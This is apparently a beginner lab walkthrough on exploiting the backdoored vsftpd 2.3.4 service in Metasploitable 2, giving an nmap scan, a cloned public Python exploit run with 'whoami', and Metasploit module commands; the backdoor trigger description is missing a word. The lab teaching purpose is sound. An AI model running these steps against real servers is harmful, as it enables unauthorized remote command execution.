Hello friends, as we know that Metasploitable 2 is one of the most popular linux based ctf which use for practice for all beginners who’s trying to dig into in cyber security or penetration testing. It contains lots of interesting stuff’s like dvwa, mutillidae. As an attacker run a normal nmap command with extra options like service version, default scripts (nmap -sV -sC example.com/IP -oN savefile) it shows lots of vulnerable services. One of the service is VSFTPD which run on port number 21 which is by default ftp port.
vsftpd, which stands for “Very Secure FTP Daemon”,is an FTP server for Unix-like systems, including Linux. In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue as the username and gain a command shell on port 6200. This was not an issue of a security hole in vsftpd, instead, someone had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.
First lets talk about manual method, here we are going to use an exploit which written in python found on github, so the thing is how’s this particular exploit works as we know that particular vulnerable version of vsftpd 2.3.4 containing backdoor itself, so this exploit is send a command to that particular backdoor like command os injection.
git clone https://github.com/In2econd/vsftpd-2.3.4-exploit.git cd vsftpd-2.3.4-exploit python3 vsftpd_234_exploit.py [IP address] [port] [command] //Example python3 vsftpd_234_exploit.py 192.168.1.10 21 whoami
Now let’s see that how we can also easily do it with metasploit-framework, so rather than discussing msf i am just tell you that metasploit-framework is top hacking tool use for exploitation as well as for post exploitation with lots of inbuilt modules into it. It’s just like kind of all automated stuff, an attacker need to put options like target address,port number or credentials some time depends on exploit.
use exploit/unix/ftp/vsftpd_234_backdoor show options set rhosts [Target IP] exploit